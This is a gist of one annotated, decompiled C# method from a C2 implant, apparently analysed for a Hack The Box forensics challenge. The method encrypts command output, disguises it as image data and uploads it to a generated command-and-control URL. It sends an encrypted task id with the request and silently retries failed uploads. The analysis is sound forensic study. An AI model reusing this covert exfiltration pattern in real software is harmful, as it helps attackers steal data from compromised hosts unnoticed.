@khr0x40sh
Created March 23, 2023 18:27
HTB:CA2023 Forensics Interstellar EXEC C2 Function
// Program
// Token: 0x06000016 RID: 22 RVA: 0x00002C38 File Offset: 0x00000E38
/// <summary>
/// Decompiled result-upload routine of the sample: encrypts a task identifier and a
/// result payload, converts the payload into image data, and uploads it to a generated URL.
/// </summary>
/// <param name="cmd">Text payload; encrypted only when <paramref name="encByte"/> is null.</param>
/// <param name="taskId">Task identifier; its encrypted form is handed to GetWebRequest as the "cookie" value.</param>
/// <param name="key">Encryption key; when null or empty, Program.pKey is used instead.</param>
/// <param name="encByte">Optional binary payload; when present it is encrypted in place of <paramref name="cmd"/>.</param>
/// <remarks>
/// Analyst notes: the routine never reports failure. Exceptions from the upload are
/// swallowed and at most five attempts are made back to back, with no delay between them.
/// Program.Encryption, Program.ImgGen, Program.UrlGen and Program.GetWebRequest are defined
/// outside this listing, so the cipher, the image format, the URL pattern and the HTTP
/// client settings cannot be confirmed from here.
/// </remarks>
public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null)
{
    // No key supplied by the caller: use the one stored in Program.pKey.
    string activeKey = string.IsNullOrEmpty(key) ? Program.pKey : key;

    // The task id is encrypted first (third argument false) and later travels with the
    // request via GetWebRequest; presumably as an HTTP cookie, going by the variable
    // name in the decompilation (confirm in GetWebRequest).
    string cookie = Program.Encryption(activeKey, taskId, false, null);

    // The payload is encrypted with the third argument true; raw bytes win over the text command.
    string encoded = encByte != null
        ? Program.Encryption(activeKey, null, true, encByte)
        : Program.Encryption(activeKey, cmd, true, null);

    // Encryption returns base64 text here; decode it back to bytes before embedding.
    byte[] cmdoutput = Convert.FromBase64String(encoded);

    // Presumably wraps the ciphertext so the upload body looks like an image (verify in ImgGen).
    byte[] imgData = Program.ImgGen.GetImgData(cmdoutput);

    // Up to five upload attempts; the first success ends the loop.
    for (int attempt = 0; attempt < 5; attempt++)
    {
        try
        {
            Program.GetWebRequest(cookie).UploadData(Program.UrlGen.GenerateUrl(), imgData);
            break;
        }
        catch
        {
            // Every exception is discarded, so a failed upload leaves no trace in this
            // routine; the next attempt builds a fresh request and URL.
        }
    }
}